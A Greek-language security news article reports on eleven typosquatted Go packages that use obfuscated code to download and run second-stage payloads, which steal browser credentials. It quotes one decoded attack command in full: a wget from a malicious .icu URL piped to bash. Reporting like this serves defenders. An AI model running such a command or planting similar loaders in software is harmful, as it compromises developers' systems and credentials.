ΑρχικήSecurityΧάκερ οπλίζουν κακόβουλα Gopackages και παραδίδουν payloads

Χάκερ οπλίζουν κακόβουλα Gopackages και παραδίδουν payloads

Οι ερευνητές κυβερνοασφάλειας έχουν αποκαλύψει μια εξελιγμένη καμπάνια κακόβουλου λογισμικού που στοχεύει το οικοσύστημα Go μέσω έντεκα κακόβουλων Gopackages που χρησιμοποιούν προηγμένες τεχνικές απόκρυψης για να παραδώσουν payloads δεύτερης φάσης.

Δείτε επίσης: Το Linux malware Koske κρύβεται σε εικόνες με αρκουδάκια Panda

κακόβουλα Gopackages

Η καμπάνια αυτή δείχνει μια ανησυχητική εξέλιξη στις επιθέσεις εφοδιαστικής αλυσίδας, εκμεταλλευόμενη τη αποκεντρωμένη φύση του συστήματος modules του Go για να διανείμει κακόβουλο κώδικα που μπορεί να παραβιάση τόσο τους διακομιστές κατασκευής Linux όσο και τους σταθμούς εργασίας Windows.

Τα κακόβουλα Gopackages χρησιμοποιούν ταυτόσημες ρουτίνες απόκρυψης βασισμένες σε δείκτες που αποκρύπτουν τη πραγματική τους λειτουργικότητα από εργαλεία στατικής ανάλυσης. Κατά την εκτέλεση, ο κώδικας δημιουργεί σιωπηλά system shells και ανακτά εκτελέσιμα payloads από διακομιστές εντολών και ελέγχου (command and control servers) που φιλοξενούνται σε εναλλασσόμενα domains .icu και .tech.

Το πιο ανησυχητικό είναι ότι δέκα από αυτά τα πακέτα παραμένουν ενεργά στο μητρώο Go Module, παρέχοντας στους απειλητικούς παράγοντες μόνιμη πρόσβαση σε οποιοδήποτε περιβάλλον ανάπτυξης τα εισάγει.

Οι αναλυτές της Socket.dev εντόπισαν ότι οκτώ από τα έντεκα πακέτα είναι εξελιγμένα typosquats νόμιμων modules του Go, προσεκτικά κατασκευασμένα ώστε να φαίνονται αξιόπιστα στους προγραμματιστές που διεξάγουν συνήθεις αναζητήσεις εξαρτήσεων. Οι ερευνητές ανακάλυψαν ότι έξι από τις δέκα κακόβουλες διευθύνσεις URL παραμένουν προσβάσιμες, υποδεικνύοντας μια ενεργή και συνεχιζόμενη απειλή για την κοινότητα ανάπτυξης λογισμικού.

Δείτε ακόμα: Anatsa: Το banking trojan επανεμφανίστηκε στο Google Play

Χάκερ οπλίζουν κακόβουλα Gopackages και παραδίδουν payloads
Χάκερ οπλίζουν κακόβουλα Gopackages και παραδίδουν payloads

Ο κακόβουλος παράγοντας εκμεταλλεύεται το αποκεντρωμένο σύστημα διαχείρισης πακέτων του Go, όπου τα modules εισάγονται απευθείας από αποθετήρια GitHub αντί μέσω κεντρικών μητρώων όπως το npm ή το PyPI. Αυτό δημιουργεί namespace confusion που οι επιτιθέμενοι εκμεταλλεύονται δημιουργώντας παρόμοια ονόματα modules με διαφορετικούς συντηρητές, καθιστώντας δύσκολη για τους προγραμματιστές τη διάκριση νόμιμων πακέτων από κακόβουλους απατεώνες.

Το κακόβουλο λογισμικό χρησιμοποιεί μια συνεπή τεχνική απόκρυψης σε όλα τα κακόβουλα Gopackages, χρησιμοποιώντας αποκωδικοποιητές βασισμένους σε arrays για να ανακατασκευάσει κακόβουλες εντολές κατά την εκτέλεση. Ο αποκρυπτογραφημένος κώδικας ακολουθεί ένα προβλέψιμο μοτίβο, δημιουργώντας πίνακες συμβολοσειρών και καλώντας διαφορετικούς δείκτες για να κατασκευάσει εντολές συστήματος που κατεβάζουν και εκτελούν απομακρυσμένα payloads.

Για παράδειγμα, το πακέτο github.com/expertsandba/opt περιέχει αποκρυπτογραφημένο κώδικα που, όταν αποκρυπτογραφηθεί, εκτελεί: /bin/sh -c wget -O – https://monsoletter[.]icu/storage/de373d0df/a31546bf | /bin/bash &. Αυτή η εντολή κατεβάζει ένα script bash απευθείας στη μνήμη και το εκτελεί στο παρασκήνιο χωρίς να γράφει στον δίσκο, επιτρέποντας τη διακριτική παράδοση payload.

Δείτε επίσης: Hackers στοχεύουν developers με 35 κακόβουλα npm packages

Τα payloads δεύτερης φάσης επιδεικνύουν εξελιγμένες τεχνικές αποφυγής (evasion techniques), υλοποιώντας ένα sleep delay μιας ώρας, για να παρακάμψουν τα συστήματα ανάλυσης sandbox. Μόλις ενεργοποιηθεί, το κακόβουλο λογισμικό καταμετρά πληροφορίες συστήματος, συλλέγει διαπιστευτήρια προγράμματος περιήγησης και εγκαθισττά μόνιμη πρόσβαση μέσω συνεχούς network beaconing σε εξωτερική υποδομή εντολών και ελέγχου.

Επιλογή της ομάδας

🔒 Προστατέψτε την ιδιωτικότητά σας με Proton VPN

Ελβετικό VPN από τους δημιουργούς του Proton Mail — αυστηρή πολιτική no-logs, ισχυρή κρυπτογράφηση και ενσωματωμένο NetShield που μπλοκάρει διαφημίσεις, trackers & malware.

  • ✔ No-logs, με έδρα την Ελβετία (εκτός 14-Eyes)
  • ✔ NetShield: φραγή διαφημίσεων, trackers & κακόβουλων domains
  • ✔ Καλύπτει όλες τις συσκευές — δωρεάν έκδοση διαθέσιμη
Δοκιμάστε δωρεάν το Proton VPN — 30 ημέρες εγγύηση επιστροφής →

Ο σύνδεσμος είναι συνεργατικός (affiliate) — το SecNews ενδέχεται να λάβει προμήθεια χωρίς επιπλέον κόστος για εσάς. Δεν επηρεάζει την ανεξαρτησία της αρθρογραφίας μας.

📧
Εγγραφείτε στο Newsletter του SecNews

Τα σημαντικότερα νέα Ασφάλειας & Τεχνολογίας στο Inbox σας.

Absenta Mia
Absenta Miahttps://www.secnews.gr
Being your self, in a world that constantly tries to change you, is your greater achievement

ΑΝΑΖΗΤΗΣΗ

FOLLOW US

📧
Newsletter SecNews
Τα σημαντικότερα νέα Ασφάλειας & Τεχνολογίας στο inbox σας.

LIVE NEWS